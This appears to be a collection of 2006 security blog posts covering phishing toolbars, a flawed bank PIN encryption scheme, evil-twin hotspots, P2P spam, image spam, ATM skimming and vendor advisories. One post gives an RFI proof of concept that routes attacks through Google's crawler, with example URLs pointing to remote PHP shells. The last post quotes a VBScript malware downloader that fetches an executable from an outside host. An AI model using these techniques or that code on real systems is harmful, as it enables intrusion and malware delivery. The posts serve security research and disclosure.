Carnegie Mellon University’s CyLab has released a new study entitled as “Phinding Phish: An Evaluation of Anti-Phishing Toolbars“.

PDF document of 20 pages is located here:

www.cylab.cmu.edu/files/cmucylab06018.pdf

E.g. SpoofGuard, EarthLink, Google, Netcraft, Cloudmark, TrustWatch, eBay and McAfee SiteAdvisor products and IE7 and Netscape 8 browsers were tested.

Well, I know that this is a bit of a shameless plug, but I also think that it’ll help out anyone who tasked with securing OS X in any way or form. I’ve just finished working with a bunch of guys on putting this checklist together for the SANS S.C.O.R.E section on their website, so take a look and I hope it helps someone out. It covers all the basic parts of securing OS X, and is more than sufficient to get a lot of people started, and to end up with a much more secure OS X installation.
http://www.sans.org/score/macosxchecklist.php?

Any comments highly appreciated.

Recently, I stumbled upon http://www.hispasec.com/laboratorio/cajamurcia_en.htm which nicely showed how a Trojan horse can, utilizing a key stroke capture and screenshot capture, grab a user’s PIN, fairly easily, and wondered why are they taking this approach when the PINs can be easily retrieved by sniffing the data sent by the user to the banking site, even though they are “encrypted”.

Image based keyboard (or virtual keyboards) were invented to make life harder for banking or phishing Trojan horses (specifically key-stroke loggers or key loggers), some even suggested they be used specifically to avoid these Trojan horses. The bad guys adapted to this technology and escalated. Now the Trojan horses take screenshots of where the mouse pointer is to determine what number they clicked on. Thing is, it is often unnecessary as in most implementations of this technique that we looked into (meaning, not all) it was flawed.

Instead of sending the remote image and waiting for the key-stroke information to be sent back to the server (the technique which the screenshots for pointer location on-click described above was used) some banks send the PIN in cleartext, while others encrypt them, one such example is cajamurcia. Even when the encryption is used, banks tend to implement it badly making it easy to recover the PIN from the encrypted form.

I investigated a bit more on how cajamurcia handles such PIN strokes (with virtual keyboards) and I noticed something strange, they take the timestamp of their server (cajamurcia) and send it to you - this already posses a security problem - and this timestamp is then used to encrypt the PIN you entered.

This would have been a good idea if the timestamp was not sent back to the server, making it hard or semi-hard to guess the timestamp used to encrypt the data, but at the same time making it harder for the server to know what timestamp was provided to the client (unless they store it inside their session information). Anyhow, as it is sent back to the server, we have everything we need to decrypt the data (PIN).

PoC:

A request to the server would look like:
(more…)

Bogus hotspots aka ‘Evil Twins’ was found in the first class lounge of an international airport, and in garages that specialise in expensive cars that offered Wi-Fi while you wait, reports Iain Thomson of Vnunet.

The article defines the evil twin like this:

So called ‘evil twin’ attacks involve putting a wireless access point near a commercial hotspot and giving it the same name.

The company interviewed by the reporter sees this threat as ‘Wireless phishing‘.

Google can be utilized to hack into websites - actively exploiting them (not information gathering by the use of “Google hacking”, although that is how most of the sites vulnerable to RFI attacks are found).

By placing a URL on any web page, Google will find it, visit it and then index it. With this mechanism, it is possible to anonymize attacks on third party web sites through Google by the use of its crawler.

PoC -
A malicious web page is constructed by an attacker, containing a URL built like so:
1. Third party site URI to attack.
2. File inclusion exploit.
3. Second URI containing a malicious PHP shell.

Example URL:
http://victim-site/RFI-exploit?http://URI-with-malicious-code.php

Google will harvest this URL, visit the site using its crawler and index it.
Meaning accessing the target site with the URL it was provided and exploiting it unwittingly for whoever planted it. It’s a feature, not a bug.

This is currently exploited in the wild. For example, try searching Google for:
inurl:cmd.gif

And note, as an example:
www.toomuchcookies.net/index.php?s=http:/%20/xpl.netmisphere2.com/CMD.gif?cmd
Which is no longer vulnerable. The %20 seems out of place, but this is how it is shown in the search.

Why use a botnet when one can abuse the Google crawler, which is allowed on most web sites?

Notes:
1. This attack was verified on Google, but there is no reason why it should not work with other search engines, web crawlers and web spiders.
2. File inclusions seem to tie in well with this attack anonymizer, but there is no reason why others attack types can’t be used in a similar fashion.
3. The feature might also be used to anonymize communication, as a covert channel.

Noam Rathaus.
(with thanks to Gadi Evron and Lev Toger)

Spam on P2P networks used to be mainly with advertising inside downloaded movies and pictures (mainly pornographic in nature), as well as by hiding viruses and other malware in downloaded warez and most any other file type (from zip archives to movie files). Further, P2P networks were in the past used for harvesting by spammers.
Today, P2P has become a direct to customer spamvertizing medium. This has been an ongoing change for a while. As we speak, it is moving from a proof of concept trial to a full spread of spam, day in, day out.
The idea is not new, but now it is becoming serious.

Some choice picks:
eBook - Googlecash - Make Money using google (Learn to use Affiliate programs to make easy money).pdf [I’ve been made aware this one is a real, yet pirated, book. Call it a false positive]
Us Banks Acounts Information [Dir]
How To Create An Automated Ebay Money Machine.pdf
Easy Chair Millionaire Review.pdf
Press Equalizer Review - Flood Your Site With Targeted Traffic, Achieve Top Rankings and Gain Dozens or More Backlinks.pdf
Top Home Based Jobs [Dir]

And so on. These are just some of the scams now being pushed over P2P.

We discussed this before; it started with fake books on the subject of online marketing, and now it has gone all the way to spammers/phishing/”affiliate programs”/spyware (or in other words online fraud related organized crime groups) looking for new ways and mediums by which to reach target audience, with email becoming more and more scrutinized and filtered.
(more…)

Reading through Zero Day Initiative’s (ZDI) advisory: Verity Ultraseek Request Proxying Vulnerability, I noticed that they mentioned that the vendor:

Verity has issued an update to correct this vulnerability. More details can be found at: http://www.ultraseek.com/support/docs/RELNOTES.txt

but going to the release notes you can quickly see that there is no mentioning of this vulnerability, nor the words Security/Vulnerability is ever mentioned in the advisory.

This could mean either of the two, ZDI’s advisory is incorrect, or Ultraseek decided to hide the fact that the vulnerability ever existed, I am assuming the latter.

This is of course saddening, no user of Ultraseek reading the release notes will ever know that the problem existed, unless they look up ZDI’s advisory.

Food for thought…

I got this polite spam which is the French version of the infamous Nigerian 419 (if that’s what it is, it lacks a dead relative.):

Bonjour,
Je me présente je suis Madame Delanoë, la collaboratrice directe d’Annie Dupas étoile d’or de la voyance 2006.

Je vous contacte car vous avez été tiré au sort et vous avez la chance de pouvoir bénéficier d’une voyance par e-mail totalement gratuite avec Annie Dupas.
(more…)

Thanks for the image to Jeff Chan. Click on it for full size.

For months now, images have been increasingly seen in spam, reaching up to 30 to 40 per cent of all spam total. For a while, counter-measures have been in play, developed by many different folks, some we know, some we don’t. From system administrators developing signatures to a team at SpamAssasin working on an OCR system to break these images and check their text for spamishness.

When first encountered, a friend of mine was as excited as me: “Why, it’s exactly like a Captcha, only in reverse!”

Hence the term I just coined - Reverse Captcha.

As it’s a cat and mouse game of escalations and counter-measured by bad guys and good guys, the bad guys learn and make our lives more difficult. I will try to explain what a Reverse Captcha is to me (and no, it’s not a special type of Turing test, although we touch on that below).
(more…)

This The Guardian article is quite confusing:

A [Manchester] man who used MP3 players to bug cash machines and steal the personal details of unsuspecting bank customers has been jailed for 32 months.

The report continues that 41 years old man and his team attached MP3 players to the backs of _free-standing_ cash machines in bars and bingo halls etc.

The data they recorded was the sound familiar from acoustically coupled modems and when you call to fax machine phone line!

The team had a special software for decoding the tones to readable information. It is easy to guess - yes, they cloned several credit cards with this mean.

The Zero Day Initiative program lists several new vulnerabilities reported within a week. From their Upcoming ZDI Advisories page:

Affected Vendor - Severity - Reported on / Age:

Microsoft - High - 2006.11.08, 7 days ago (2 advisories)
Mozilla - High - 2006.11.08, 7 days ago
Computer Associates - High - 2006.11.08, 7 days ago (3 advisories)
Kaspersky - High - 2006.11.09, 6 days ago
Symantec - High - 2006.11.09, 6 days ago

It appears that many of them are related to AV or firewall software or am I wrong? CA, Kaspersky, Symantec etc.

Unknown Sophos products suffer from unpatched vulnerabilities too, but they are about two months old:

Sophos - High - 2006.09.14, 62 days ago (2 advisories)

And Mozilla and Microsoft products have their own unpatched issues listed as well.

So, it’s time to another blog entry, another idiot/dumb post…

http://www.securityfocus.com/archive/1/451637/30/0/threaded

And for sure DragonFlyBSD and TrustedBSD* are also affected for this issue… why?

The bug occur because bsd developers does not know how integer convertion is done? Or just because you have copy and paste the bug from another BSD to yours? It’s always a problem when you copy code from another location. How secure is that code? What is the historical security problems it has? Let’s audit it!
Congratulations to you, OpenBSD guys, who simply don’t support things you don’t audit… why someone wanna use firewire? hehehe . Yeah! Is pretty easy talk about the problems, but, how I can help to solve it? I really dunno… In my mind, you need to understand the code you are copying, but, for god, please, copy it

Cya,

Rodrigo Rubira Branco (BSDaemon).

It appears that one Web site of Polish police www.elblag.policja.gov.pl/ has been defaced on Tuesday.

Mirror of Zone-H is located here. The home page was the target of the attack, i.e. that is the reason site is not working just now.

They were running on Linux and the following Apache system:

Apache-AdvancedExtranetServer/2.0.47 Mandrake Linux/1.6.91mdk mod_perl/1.99_08 Perl/v5.8.0 auth_mysql/1.11 mod_ssl/2.0.47 OpenSSL/0.9.7a PHP/4.3.1

If some of the readers know what the “elblag” means I will be grateful

It sounds like a good start, Vista appears to be not affect any of the 6 new advisories released today by Microsoft. The vulnerability affecting Vista is the XML Core vulnerability in IE that has been recently exploited by malicious web sites to execute arbitrary code.

It would be interesting to see whether this trend of Vista staying outside the spotlight of vulnerabilities continues.

[UPDATE] - The XML vulnerability doesn’t affect Vista sorry for the confusion:

Is Windows Vista vulnerable to this issue?
Windows Vista does not include a vulnerable version of Microsoft XML Core Services. Windows Vista includes msxml6.dll version 6.10.1129 and is not vulnerable. However, if an application has been applied that installed a vulnerable version of Microsoft XML Core Services 4.0 this update should be applied

As users familiar with Notes/Domino systems know, publishing Address Books at company Web site is not a good idea.

Let’s look the risks of ID files now. It was not covered widely last week when information about information disclosure vulnerability in Domino systems was published. Notes Remote Procedure Call (NRPC) protocol on port 1352 enables to download user ID files remotely. Huh!

Versions 5.0, 6.0, 6.5, and 7.0 are affected. Fixed versions 6.5.5 Fix Pack 2 (FP2) and 7.0.2 have been released. There is no fix for R5 versions any more, because R5 is not supported any more. The vendor states that Windows, Linux, AIX and Solaris systems are vulnerable.

IBM Technote document #1248026 available here.

More details via FortConsult advisory [PDF] of Mr. Andrew Christensen.

But old fashioned organisations possible using Notes R5 still - it’s time to upgrade to R6 or R7 ASAP.

One of our customers have brought this HTML based malware to our attention:

[title][/title]
[head][/head]
[body]
[script language=”VBScript”]
on error resume next

‘ due to how ajax works, the file MUST be within the same local domain
dl = “http://grupo-arroba.by.ru/grupo.exe”

‘ create adodbstream object
Set df = document.createElement(”object”)
df.setAttribute “classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36″
str=”Microsoft.XMLHTTP”
Set x = df.CreateObject(str,”")
(more…)